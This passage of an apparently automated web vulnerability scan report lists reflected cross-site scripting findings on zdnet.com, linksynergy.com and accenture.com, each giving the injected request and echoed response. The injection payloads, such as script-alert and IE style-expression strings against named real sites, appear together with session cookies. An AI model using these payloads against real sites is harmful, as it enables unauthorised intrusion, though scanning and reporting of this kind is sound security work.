Set-Cookie: BLITZEN-2900=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2902=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2904=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2906=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2908=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2910=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2912=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2914=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2916=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2918=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2920=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2922=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3000=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3002=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3004=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3006=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3008=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3010=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3012=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3014=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3016=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3018=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3020=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3022=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: pis=1; path=/;
Set-Cookie: zm=AQABAAAAsgcAABRbdldWdQEFaEGe-tlgKFJHAehN5kSlrN8dYh72DI9P_4twHzYlv-VeGodh4ULrT1BSE-B6AECC1O1LpS32oYzqyIgy_IBEiy8JvyGSSu7EPdplj_-fnbZB1IQ_l7vhKNx2V_jY; domain=.zazzle.com; path=/
Set-Cookie: zs=76DF1A08-EDBE-41A5-8118-1A899617B810%7c0%7c12934848968%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: us=2735708D-91B8-49A9-B5EF-6149EA93ADFA; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: general%5Fmaturity=1; domain=.zazzle.com; path=/
Set-Cookie: s=5245945740116737590; path=/
Date: Sun, 21 Nov 2010 21:36:08 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html
...[SNIP]...
<a href="javascript://" id="zl7">Search: e88dd<script>alert(1)</script>e6db59895f8</a>
...[SNIP]...

1.1427. http://www.zdnet.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6e05"><a>57a82352eda was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: e6e05"><a>57a82352eda

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:32:53 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22618%22%2C%22longittude%22%3A%22-95.363%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22houston%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2218%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2229.763%22%7D; expires=Mon, 21-Nov-2011 21:32:53 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=998
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 109576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/adlog.com.com/adlog/i/r=6455&amp;sg=1815&amp;o=10%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2000&amp;nd=10&amp;pid=&amp;cid=0&amp;pp=100&amp;e=&amp;rqid=00c13-ad-e3:4CE9469D511210&amp;orh=e6e05"><a>57a82352eda&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=e6e05">
...[SNIP]...

1.1428. http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58b2"><a>f6d26512e03 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: a58b2"><a>f6d26512e03

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:33:22 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22618%22%2C%22longittude%22%3A%22-95.363%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22houston%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2218%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2229.763%22%7D; expires=Mon, 21-Nov-2011 21:33:22 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=992
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 109147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/i/r=7005&amp;sg=1815&amp;o=6037%253A13616%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2100&amp;nd=13616&amp;pid=&amp;cid=192487&amp;pp=100&amp;e=&amp;rqid=00c13-ad-e6:4CE95DD638835F&amp;orh=a58b2"><a>f6d26512e03&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=a58b2">
...[SNIP]...

1.1429. http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74336"><a>4a81cf23a9d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 74336"><a>4a81cf23a9d

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:34:05 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22618%22%2C%22longittude%22%3A%22-95.363%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22houston%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2218%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2229.763%22%7D; expires=Mon, 21-Nov-2011 21:34:05 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 108251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/r=8041&amp;sg=470116&amp;o=6037%253A13616%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2100&amp;nd=13616&amp;pid=&amp;cid=192487&amp;pp=100&amp;e=&amp;rqid=00c13-ad-e2:4CE97CD8161260&amp;orh=74336"><a>4a81cf23a9d&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=74336">
...[SNIP]...

1.1430. http://www.zdnet.com/search [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /search

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7797"><a>311d03eabfd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /search HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: e7797"><a>311d03eabfd

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:33:18 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22618%22%2C%22longittude%22%3A%22-95.363%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22houston%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2218%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2229.763%22%7D; expires=Mon, 21-Nov-2011 21:33:18 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 85985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
p;ASSET_HOST=adimg.zdnet.com&amp;PTYPE=2448&amp;CNET-ONTOLOGY-NODE-ID=5&amp;&amp;CID=0&amp;&amp;POS=100&amp;ENG:DATETIME=2010.11.21.16.33.21&amp;SYS:RQID=01c13-ad-e2:4CE93283660D1C&amp;&amp;REFER_HOST=e7797"><a>311d03eabfd&amp;&amp;&amp;&amp;&amp;&amp;CNET-PAGE-GUID=41WLxAoPOUcAAAKJ6coAAAAJ&amp;adfile=10828/11/465564_wc.ca" width="300" height="250" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" s
...[SNIP]...

1.1431. http://www.zdnet.com/search [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /search

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35936"><a>f54325b105e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /search HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 35936"><a>f54325b105e

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:32:58 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22618%22%2C%22longittude%22%3A%22-95.363%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22houston%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2218%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2229.763%22%7D; expires=Mon, 21-Nov-2011 21:32:58 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=992
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 94702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
://adlog.com.com/adlog/i/r=7005&amp;sg=1815&amp;o=5%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2448&amp;nd=5&amp;pid=&amp;cid=0&amp;pp=100&amp;e=&amp;rqid=01c13-ad-e6:4CE9476F5028EC&amp;orh=35936"><a>f54325b105e&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=35936">
...[SNIP]...

1.1432. http://click.linksynergy.com/fs-bin/click [RD_PARM1 parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://click.linksynergy.com
Path:   /fs-bin/click

Issue detail

The value of the RD_PARM1 request parameter is copied into the HTML document as plain text between tags. The payload 125ee<script>alert(1)</script>f5c10ca5f21 was submitted in the RD_PARM1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fs-bin/click?id=/1Vwg7V501c&subid=&offerid=146261.1&type=10&tmpid=3909&RD_PARM1=http://itunes.apple.com/us/app/wired-magazine/id373903654%3fmt=8125ee<script>alert(1)</script>f5c10ca5f21 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.wired.com/magazine/?intcid=gnav
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: click.linksynergy.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Set-Cookie: lsn_statp=MKdXKh0AAACM791JLaS%2FPQ%3D%3D; Domain=.linksynergy.com; Expires=Sun, 17-Nov-2030 01:34:09 GMT; Path=/
Set-Cookie: lsn_qstring=%2F1Vwg7V501c%3A146261%3A; Domain=.linksynergy.com; Expires=Tue, 23-Nov-2010 01:34:09 GMT; Path=/
Set-Cookie: lsn_track=UmFuZG9tSVYhfJ4QDtPxoGXC48FeucNxS9NcyX19mNclTs3SbofxL98WAoV3iwV6zjrwpnveJn4u5XFwAtNT%2Bw%3D%3D; Domain=.linksynergy.com; Expires=Thu, 19-Nov-2020 01:34:09 GMT; Path=/
Set-Cookie: lsclick_mid13508="2010-11-22 01:34:09.331|_1Vwg7V501c-f8M8zQME2vXMhD6yByqk6w"; Domain=.linksynergy.com; Expires=Wed, 21-Nov-2012 01:34:09 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 22 Nov 2010 01:34:09 GMT
Cache-Control: no-cache
Pragma: no-cache
Location: http://itunes.apple.com/us/app/wired-magazine/id373903654?mt=8125ee<script>alert(1)</script>f5c10ca5f21&partnerId=30&siteID=_1Vwg7V501c-f8M8zQME2vXMhD6yByqk6w
Content-Type: text/html;charset=UTF-8
Connection: close

<html>
<head>
<title>301 Moved Permanently</title>
</head>
<body>
<p>The page you are requesting has moved to <a href="http://itunes.apple.com/us/app/wired-magazine/id373903654?mt=8125ee<script>a
...[SNIP]...
</script>f5c10ca5f21&partnerId=30&siteID=_1Vwg7V501c-f8M8zQME2vXMhD6yByqk6w">http://itunes.apple.com/us/app/wired-magazine/id373903654?mt=8125ee<script>alert(1)</script>f5c10ca5f21&partnerId=30&siteID=_1Vwg7V501c-f8M8zQME2vXMhD6yByqk6w</a>
...[SNIP]...

1.1433. http://click.linksynergy.com/fs-bin/click [RD_PARM1 parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://click.linksynergy.com
Path:   /fs-bin/click

Issue detail

The value of the RD_PARM1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca0f"><script>alert(1)</script>6d0a59a02a6 was submitted in the RD_PARM1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fs-bin/click?id=/1Vwg7V501c&subid=&offerid=146261.1&type=10&tmpid=3909&RD_PARM1=http://itunes.apple.com/us/app/wired-magazine/id373903654%3fmt=83ca0f"><script>alert(1)</script>6d0a59a02a6 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.wired.com/magazine/?intcid=gnav
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: click.linksynergy.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Set-Cookie: lsn_statp=2KRXKh0AAAB8ycjww6OeNQ%3D%3D; Domain=.linksynergy.com; Expires=Sun, 17-Nov-2030 01:34:09 GMT; Path=/
Set-Cookie: lsn_qstring=%2F1Vwg7V501c%3A146261%3A; Domain=.linksynergy.com; Expires=Tue, 23-Nov-2010 01:34:09 GMT; Path=/
Set-Cookie: lsn_track=UmFuZG9tSVatN3Ldhg%2BTU3Ajn5ldCQB3XdLKD%2BZU4fYyyiVVpvWEFYFgrExYLDmLV1ZfzKChqQYRwnSE9IANFQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 19-Nov-2020 01:34:09 GMT; Path=/
Set-Cookie: lsclick_mid13508="2010-11-22 01:34:09.078|_1Vwg7V501c-ggnz2nJwI33fdVpABGq_dQ"; Domain=.linksynergy.com; Expires=Wed, 21-Nov-2012 01:34:09 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 22 Nov 2010 01:34:08 GMT
Cache-Control: no-cache
Pragma: no-cache
Location: http://itunes.apple.com/us/app/wired-magazine/id373903654?mt=83ca0f"><script>alert(1)</script>6d0a59a02a6&partnerId=30&siteID=_1Vwg7V501c-ggnz2nJwI33fdVpABGq_dQ
Content-Type: text/html;charset=UTF-8
Connection: close

<html>
<head>
<title>301 Moved Permanently</title>
</head>
<body>
<p>The page you are requesting has moved to <a href="http://itunes.apple.com/us/app/wired-magazine/id373903654?mt=83ca0f"><script>alert(1)</script>6d0a59a02a6&partnerId=30&siteID=_1Vwg7V501c-ggnz2nJwI33fdVpABGq_dQ">
...[SNIP]...

1.1434. http://www.accenture.com/Accenture/Registration/EAN.aspx [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /Accenture/Registration/EAN.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fb2ff'style%3d'x%3aexpression(alert(1))'3c988d977d0 was submitted in the REST URL parameter 3. This input was echoed as fb2ff'style='x:expression(alert(1))'3c988d977d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Accenture/Registration/EAN.aspxfb2ff'style%3d'x%3aexpression(alert(1))'3c988d977d0 HTTP/1.1
Accept: */*
Referer: http://www.accenture.com/Global/Contact_Us/default.htm
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.accenture.com
Proxy-Connection: Keep-Alive
Cookie: Commerce2002_TestSessionCookie=TestCookie; UrlTracker=ThankYouPageTitle=Confirmation&Content=&ReferrerPageURL=/global/personalization&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; Commerce2002_TestPersistentCookie=TestCookie; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; UserPref=Culture^en-US

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Location: https://www.accenture.com/Accenture/Registration/EAN.aspxfb2ff'style='x:expression(alert(1))'3c988d977d0
Content-Type: text/html; charset=utf-8
Content-Length: 221
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 16:48:02 GMT
Connection: close
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:01 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.accenture.com/Accenture/Registration/EAN.aspxfb2ff'style='x:expression(alert(1))'3c988d977d0'>here</a>.</
...[SNIP]...

1.1435. http://www.accenture.com/Accenture/Registration/LoginPage.aspx [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /Accenture/Registration/LoginPage.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4ae7d'style%3d'x%3aexpression(alert(1))'5890a800d50 was submitted in the REST URL parameter 3. This input was echoed as 4ae7d'style='x:expression(alert(1))'5890a800d50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Accenture/Registration/LoginPage.aspx4ae7d'style%3d'x%3aexpression(alert(1))'5890a800d50 HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 302 Moved Temporarily
